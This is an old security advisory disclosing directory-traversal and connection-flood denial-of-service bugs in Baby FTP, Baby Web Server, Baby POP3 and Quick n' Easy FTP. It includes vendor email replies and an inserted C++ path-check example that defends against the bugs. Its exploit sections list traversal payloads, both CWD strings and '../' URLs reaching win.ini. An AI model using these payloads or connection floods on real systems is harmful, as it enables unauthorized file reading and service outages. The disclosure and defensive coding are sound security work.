Baby FTP server version 1.2 allows for a directory traversal attack that lets a remote attacker view any file on the system by using non-standard characters with CWD. The server will also crash if multiple connections from the same host occur.
In this advisory there are some vulnerabilities I found yesterday in BabyFtp server, Baby web server, Baby Pop3
server and Quick n' easy Ftp.
I informed the Company about these vulnerabilities and here are the e-mails they sent me:
-----------------------------------------------------------------
From pablovandermeer@kabelfoon.nl Wed May 28 21:42:08 2003
Return-Path : <pablovandermeer@kabelfoon.nl>
Received : from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 21:42:07 +0300
Received : from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 20:39:21 +0200 (CEST)
Message-ID : <000f01c32548$73cf3be0$0100a8c0@PABLO>
From : "Pablo" <pablovandermeer@kabelfoon.nl>
To : xxxxxx xxxxxxx <dr_insane@pathfinder.gr>
References : <200305281812.h4SICUvC016027@localhost.localdomain>
Subject : Re: Multiple Vulnerabilities Found :)
Date : Wed, 28 May 2003 20:39:20 +0200
MIME-Version : 1.0
Content-Type : text/plain; charset="iso-8859-7"
Content-Transfer-Encoding : 8bit
X-Priority : 3
X-MSMail-Priority : Normal
X-Mailer : Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To : "Pablo" <pablovandermeer@kabelfoon.nl>
X-MimeOLE : Produced By Microsoft MimeOLE V6.00.2800.1106
Hi,
Thank you very much for your report.
First let me say that BabyFtp server, Baby web server, Baby Pop3 server are
NOT real products but just (MFC) sample applications!
They contain even more bugs than you can think of...
As for Quick 'n Easy FTP server: can you make more connections than
configured in 'Max connections' settings?
If so how did you manage to do that?
Regards,
Pablo
Ok, thanks!
It looks like this is related to the size of physical memory, when new
sockets are created in virtual memory it will crash the application... :(
I will take a look at it first thing tomorrow morning.
Regards and keep on hacking...
Pablo
------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------
Release Date:
MAY 28, 2003
Systems Affected:
Baby Ftp server Version 1.2
Description:
While I was testing Baby Ftp Server last night I found some vulnerabilities. Let's take a look at the following:
1) The FTP server is vulnerable to a directory traversal attack. A remote user can see the whole hard disk
by supplying some strange CWD commands.
2) There is also a DoS attack. If you try to establish multiple connections from the same host on Baby Ftp server it will crash.
Let's Dance (Exploit)
--------------------
(1)
You need to supply these CWD commands for a successful attack:
CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../
(2)
Let's try to establish about 100 connections with the server from the same IP:
1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server
b00m..crash:>
The error message will be: "Unhandled exception(MFC42.DLL):0xC00000005:Access Violation"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------
Systems Affected:
Quick n' easy FTP server 1.7
Description:
------------
There is one DoS attack (yes again!) in Quick n' easy FTP server 1.7. By making a large number of connections you can crash the
server :>
Exploit:
--------
The same as above... try to establish a large number of connections from the same IP and the server will crash.
BABY web server 1.5 Multiple bugs
---------------------------------------
Systems Affected:
Baby Web server 1.5
Description:
------------
While I was checking Baby web server version 1.5 I found some stupid bugs. The first is a directory traversal bug and the second
a DoS attack. Let's find out what is going on!
Exploit:
--------
(1) You can read whatever you want on the remote server by supplying some /.././ in your Web browser:
https://[server]/../../../../windows/win.ini
https://[server]\..\..\..\windows/win.ini
etc..etc..etc...
(2)
Again, by making a very large number of connections the web server will crash :) It seems that all the products of
www.pablovandermeer.nl have the same problem.
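
On the defensive side, both the CWD strings listed for Baby FTP and the URL forms listed for Baby web server are refused by a path check that treats "/" and "\" alike, rejects dot-only names and never lets ".." climb above the served root. This C++ code is an added example, not code from the Baby servers or from the advisory; `resolve_virtual` and the `/pub` directory are hypothetical names.

```cpp
#include <iostream>
#include <string>
#include <vector>

// Resolve a client-supplied path (FTP CWD argument or HTTP request path)
// against the session's virtual directory. On success writes the normalized
// virtual path to `out`; returns false when the request must be refused.
// Hypothetical helper written for this example.
bool resolve_virtual(const std::string& cwd, const std::string& arg,
                     std::string& out) {
    std::vector<std::string> stack;
    auto feed = [&stack](const std::string& path) -> bool {
        std::string part;
        for (std::size_t i = 0; i <= path.size(); ++i) {
            const char c = i < path.size() ? path[i] : '/';  // sentinel flushes last part
            if (c == '\0' || c == ':') return false;  // NUL, drive letter, stream name
            if (c != '/' && c != '\\') { part += c; continue; }  // both separators count
            if (part == "..") {
                if (stack.empty()) return false;  // would climb above the served root
                stack.pop_back();
            } else if (!part.empty() && part != ".") {
                // Refuse "...", "......" and names ending in '.' or ' ': the file
                // system may not open the same name that was checked here.
                if (part.back() == '.' || part.back() == ' ') return false;
                stack.push_back(part);
            }
            part.clear();
        }
        return true;
    };
    const bool absolute = !arg.empty() && (arg[0] == '/' || arg[0] == '\\');
    if (!absolute && !feed(cwd)) return false;  // relative: start from session dir
    if (!feed(arg)) return false;
    out.clear();
    for (const auto& p : stack) out += "/" + p;
    if (out.empty()) out = "/";
    return true;
}

int main() {
    // Constructed inputs: the strings quoted in the advisory plus two benign ones.
    for (const char* a : {"...", "/...", "/......", "\\...", "...\\", ".../",
                          "/../../../../windows/win.ini", "docs", "a/./b//c"}) {
        std::string v;
        const bool ok = resolve_virtual("/pub", a, v);
        std::cout << a << " -> " << (ok ? v : std::string("REFUSED")) << "\n";
    }
}
```

The returned virtual path is what gets appended to the served root; a server should still canonicalize the final on-disk path and confirm it lies under that root before opening it.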
BABY Pop3 server Version 1.0 DOS attack
---------------------------------------
Systems Affected:
BABY Pop3 server version 1.0
Description:
------------
There is the same DoS vulnerability here :P You can crash the server by making multiple connections from the same host.
-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------
Feedback
---------
Please send suggestions and Comments to:
dr_insane@hack.gr
https://members.lycos.co.uk/r34ct/